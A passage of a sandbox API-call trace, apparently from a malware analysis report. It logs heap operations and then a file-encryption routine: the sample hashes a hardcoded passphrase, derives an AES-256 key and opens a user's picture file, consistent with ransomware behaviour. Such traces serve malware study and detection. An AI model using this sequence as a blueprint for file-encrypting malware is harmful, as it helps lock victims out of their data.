hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.882] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.882] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.883] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e478 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0092.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca358, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0092.885] CloseHandle (hObject=0x258) returned 1 [0092.885] FreeLibrary (hLibModule=0x772d0000) returned 1 [0092.885] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0092.885] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\9Y-cpSQgv6l3vMS-rl5.png", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x382517a0, ftCreationTime.dwHighDateTime=0x1d5eb00, ftLastAccessTime.dwLowDateTime=0x417af580, ftLastAccessTime.dwHighDateTime=0x1d5ef7f, ftLastWriteTime.dwLowDateTime=0x417af580, ftLastWriteTime.dwHighDateTime=0x1d5ef7f, nFileSizeHigh=0x0, nFileSizeLow=0x9ea4, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="9Y-cpSQgv6l3vMS-rl5.png", cAlternateFileName="9Y-CPS~1.PNG")) returned 0x41ac640 [0092.886] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0092.886] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.886] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0092.886] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0092.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0092.886] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0092.887] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0092.887] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.887] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0092.887] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.887] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.887] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.887] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.887] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cab68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0092.887] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0092.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0092.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0092.988] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0092.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0092.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0092.988] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.988] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cabf8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0092.989] CryptHashData (hHash=0x41ac040, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0092.989] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.989] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.989] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0092.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cab08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0092.989] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac740) returned 1 [0092.989] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.989] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0092.989] CryptDestroyHash (hHash=0x41ac040) returned 1 [0092.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0092.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0092.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0092.991] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0092.991] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0092.991] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.991] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\9Y-cpSQgv6l3vMS-rl5.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\9y-cpsqgv6l3vms-rl5.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0092.992] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.992] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0092.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0092.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0092.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0092.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.992] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.992] 